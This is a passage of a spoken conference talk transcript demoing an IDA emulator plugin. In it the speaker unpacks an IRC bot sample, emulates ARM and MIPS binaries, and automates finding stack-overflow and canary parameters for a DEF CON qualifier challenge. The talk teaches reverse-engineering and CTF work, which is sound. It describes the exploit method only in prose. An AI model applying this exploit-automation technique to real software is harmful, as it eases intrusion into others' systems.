out, uh, and I considered that approach, but for the user interface aspect of it, I might have gone that way, now let's see if, uh, box is behaving for us, and over on the box side, we got, uh, hopefully the same strings, somewhere, yeah, we got all this
library code, I have no idea where that's even coming, nope, oh yeah, here we go,
right, and so here are, again, it's an IRC bot, and you can see registry keys in there that it's going to reference and so on, so we get the same result, but we haven't modified the IDA database at all, okay, so it's like a running process, okay, and I would
have to then extract this from box back into IDA, right, if I wanted to make this, uh, data permanent, okay, so this is, again, the approach that I took, and now we'll go do this a different way, and this is where we thought those demos were bad, let's see how we
do here, set a breakpoint up here, try to set a breakpoint, same place down here, okay, and this time, I'm going to switch my debugger over, and if it's installed appropriately,
it'll show up as school debug, okay, so we do this, and we go back up here to the beginning, and we try to kick this off, hopefully I hit my first breakpoint, okay, and then the plugin looks a lot like box, right, so, but this is unicorn handling this
particular emulation, and so you get register state over here, just like you do in box, and any other debugger, and so on, and at this point, we can just step through, and it tracks along, and I can let it run, and we'll do the whole strings trick, see if we get
anything interesting, okay, right now there's not much, but names of the couple libraries that get imported, and we go back over here, and we let it run, just hit go here, hit our breakpoint, come back, rerun strings, and like the other two emulators,
now we've got all of these, right, strings extracted from memory, and if we go down to the bottom of the self decoding loop, we can jump up, and very much like box, right,
this is the extracted code, which we can then turn into code up here in our emulator, or in the debugging session, but again, I don't have that back in my database, and when I go to quit this, I'm right back where I started from, and I don't have any strings, and if I follow the jump, right, up here, you can see it's empty, right, because this is the
region in the binary that it unpacks itself into, right, so it's very much like a debugger, and not a static, you know, overwrite or whatever you might want to call it, okay, so that's it emulating on 32-bit x86 code on 64-bit Windows, let's see what else I think I'm
going to do, okay, local ARM emulation, so Windows platform, no network connections, no ARM hardware, somewhere I've got an ARM binary open, let's see where this one comes from, there we go, okay, this is an ARM binary from an old DefCon capture the flag,
shout out to legit BS, right, okay, one of their first CTFs, but ARM binary on Windows, okay, and actually it's not going to offer me any debuggers because I have no clue what to
do with this, right, ELF binary, ARM, Windows, right, don't do ELF, don't do ARM, okay, but the debugger recognizes the architecture at least, so it says I'm available, and it's the available, so IDA's already selected it up there, and we can kick this off, and now we're
debugging ARM, more or less, emulation, don't worry about that, awesome, um, let's see what goes on, so there's some memory mapping problems there, let's see if, yep, not going to work, clapping for my crash, it's all, look at that, we'll just pass all these
exceptions down, and it looks like it's advancing, and maybe it's even updating registers, okay, um, R2 is actually equal to 1 at this point, look at that, okay, um, I left this open, and it had some stale state, and I think it's not happy with me, okay, but that's
the idea, right, we're in a debugging session, um, and we can jump in and out of this, without having to fire up an ARM environment, okay, do any remote communications to a remote ARM device, and then when we're done, we step out, and we're back in our IDA disassembly session, okay, what else, oh, now MIPS, let's see, MIPS, I don't even have any
idea how to read, right, so, somebody out there probably says that's MIPS, I don't know, right, IDA thinks it's MIPS, again, no MIPS debugger on IDA, I can't switch my
debuggers, right, there's no other debugger option, but you can see that, no, don't do that, school debug is selected, okay, so we try to hit go here, and hopefully we hit our breakpoint, uh, from which maybe we can step, okay, although I don't have a stack,
this is probably a bad choice, let's see, step, step, step, step, right, and we're tired, okay, so we hop out of that, and we're back in, back to our disassembly view, okay,
and I'm not going to go into the ways you integrate, you know, what you have available in your disassembly view, and what you have available in your static view, but suffice it to say, there's ways to pull information back across if you decide that it's useful for augmenting what you have on the static side, and last thing I'm going to do is take a look at, uh, one of the challenges from DEF CON qualifiers this year, uh,
and what this was, was a binary that they gave you a thousand of them, okay, and when you went to interact with the competition, they asked, you had one minute, right, to craft an
exploit for one of these thousand binaries that they gave you the file name for, so you downloaded a thousand binaries, and you had a minute to craft the exploit, so it's going to take a long time to do all that by hand, okay, so you want to automate this, and you want to have an answer in your hip pocket when they say, give me your exploit for
binary number one, okay, so, how do you automate? Well, it turns out that all of these binaries have roughly the same pattern, and I'll describe it not by looking at the code, but by looking at the stack, and there's two buffers in here, okay, and all of the binaries differ in the location of that user input buffer in the stack relative to the
save return address, the size of that user input buffer in the stack, and then the content that gets placed into what I've called a canary string right there, okay, so they gave you a free overwrite out of that user input buffer, but you have to figure out
how much do I have to overwrite to clobber EIP, okay, and after you've done that, right, which is not a problem, there's nothing hindering the overwrite, but they come back and verify that the canary string matches the original canary that they placed in there, so as you do your overwrite, you've got to rewrite the canary in there, and it better match your
original string, but all thousand binaries have a different canary, and it's not always obvious exactly the way they set it, right, they compute it, they copy it in one byte at a time, they do a string copy, they do it a lot of different ways, but they always end up doing a string compare, okay, at the end, so if you can put a breakpoint at the string
compare, right, and hit it, it doesn't matter what you filled the buffer with, you can do some other computations to figure out the distance from the start of your buffer to save the EIP, set a breakpoint on the string compare, right, look at the required argument that's sitting on the stack, and pick that out, and these become your parameters, what's my canary got to be, right, how long is it from EIP all the way
down to the buffer, and there's a couple other constants that you needed to pick out, but I didn't want to do this a thousand times by hand, nobody did, and there's some good write-ups about using some other automated systems, uh, to solve this, but what I did was I scripted up this emulator, and the emulator, let's see, somewhere the script
exists, down here, you see things, because this is implemented as an IDA emulator, right, you get all of IDA's debugger scripting, I'm sorry, IDA debugger, all of IDA's debugger scripting can be used to drive this thing, right, so we write the script, we load the debugger, we set some debugger options to break on start, we run to the start
address, right, we do some things, hey, we get the, the value of EIP, and I'm picking out all of the arguments, all of the bits and pieces from a dynamic environment, although I'm not actually running a process, I'm just emulating through it, uh, and by the time I get done down to the bottom, I've picked out a bunch of parameters that I'm
gonna need, and what I did was I just took those parameters and wrote them out as a Python dictionary entry, and so I had a dictionary of parameters, when they told me what binary do you want to exploit, I said, well, I named it, my key into my dictionary is the name of the binary, I pick out the parameters, right, and I craft my buffer and fire it
at them, and what that looks like is this, we run IDA in batch mode, and then I'll be doing this one, and we've got, which one, this one, okay, so I've got two windows right
here, I'm tailing an output file on the bottom, okay, I'm gonna use IDA in batch mode, you can see the long command line there, and what I'm gonna do is I'm gonna run that script that I wrote, and I'm gonna run it against one of these thousand binaries, well, in
this directory there's three hundred of them, they all scroll up like that, and we'll see if this will work, make sure I clear out some stale files, namely I gotta kill that IDA session, cause it's gonna get in the way of the batch run, and we'll try this out,
you'll see IDA flash, you have to look in the background, if everything works, so IDA's coming up in batch mode, we're in debugger mode, it's done, you can see the output down on the bottom, right, that quickly, it got into an emulation on that ELF binary,
okay, ran through main, picked off the parameters it needed and dumped them out to me, now I wrap that in a loop, do it for every file in the current directory, and I've got my thousand exploit parameters and I'm ready to connect to the remote side, okay, so for the
future, and very quickly, better user interface when launching the emulator, be nice to be able to specify some register state, right now I just take a guess, right, where do you want to start your emulation, do you want any register to have particular values, so I'd like to have that done up, um, some options for mapping into particular memory
regions or loading other regions, uh, if you're familiar with IDA and debuggers, there's a very useful interface called app call, that just, that actually lets you incorporate, uh, functions or call them almost natively from IDA Python, right, call out and have your function run and then spit the value back to you in your scripts, uh, I'd like to have
a hooking library, okay, to be able to hook various functions and do things maybe other than what the emulator's doing or provide shims for library calls or system calls, things like that, uh, and I'll also perhaps add the option to go ahead and pull in all of the shared libraries, uh, that a dynamically linked binary might link to, so you can
follow the library calls down into a shared library function and emulate your way through those if you wanted to do so, rather than writing all the shims for them, uh, it's out there on GitHub, it's out there today, uh, I will push all the latest changes shortly after the con, uh, but if you're interested, uh, I'm always, uh, interested in
feedback, if you want to collaborate, I'd love to hear from you, if you have ideas, uh, on features that might make it more useful, uh, and you don't want to implement them, at least share them with me and maybe I'll get around to them or find somebody, uh, who might, uh, like to implement any of your ideas, and that's it, and I'm happy to take questions, and if not, uh, if no questions, please enjoy the rest of your con. Thank you. Um, do we
have microphones somewhere for questions? Yeah, yeah, I'm supposed to direct you to a microphone, so it gets picked up, you can come, if you want to come up here. Microphone is, oh,
it's right here, it's right over here. Drink, don't forget your drink, that's right. Hello, um, a couple slides back, you mentioned the two, uh, console output windows, that's the wrong way, how do you recognize what Magic 4 bytes overwrite EIP and how do you deal with bad characters? Um, when I was doing the scripted demo, so what I did was, in the
scripted demo, what I had to do was I had to study a couple of the binaries manually, right, not a thousand of them, but I looked at two or three of them, uh, looked at the first one, I said, well, this is clearly an easy stack overflow, I understand if it was just this one, exactly how I would exploit it, then I looked at another one, I said,
oh, this one is subtly different, what's different about it, and can I develop an analysis that walks through the program and at certain key points in the program picks off certain things for me, okay, so what are the parameters, where is that buffer getting copied, really, um, the, the string cop-, or the string compare gives it all away,
it tells me the start of the user buffer and the start of the canary buffer, and from there, what I can do is do some math to figure out where saved EIP was, okay, third binary, right, all of these things, again, looking similar, and so I took what I had learned from looking at three binaries, developed an automated process that I would apply to the three binaries, and then it extended nice and neatly to the thousand binaries, which was roughly
what they intended, and what they wanted to do was force you to do it quickly, right, so you, you weren't going to be able to, if you tried to reverse engineer all thousands to develop these answers, you wouldn't have finished in the weekend, so I don't, does that answer your question? Yeah, yeah, now, I'm assuming that's, that's the logic
you have to hard code into the program, or does it auto-detect that? Uh, that's the logic that you have to bake into the script that you write, so, through here, right, are some various things that I was looking for, right, you see I'm extracting some register values, I'm stepping one instruction at a time, I, I'm asking, you know, am I at certain types of instructions, I'm counting the number of calls, hey, that I've encountered, because,
you know, the third call down the chain was going to be the strcpy, and when I got to the strcpy, or the string compare, or, you know, you can see what I'm doing is I'm picking some arguments off the stack, right, that have been placed there, that are passing to the string compare, and then I, I'm using that to derive all the information I need to
cross the exploit parameters. Okay, awesome, thank you. Okay, sure. Any other questions? You trying to get me out of here? I think we're done, thanks very much. I'll be happy to talk to you after the side of the stage. Thank you.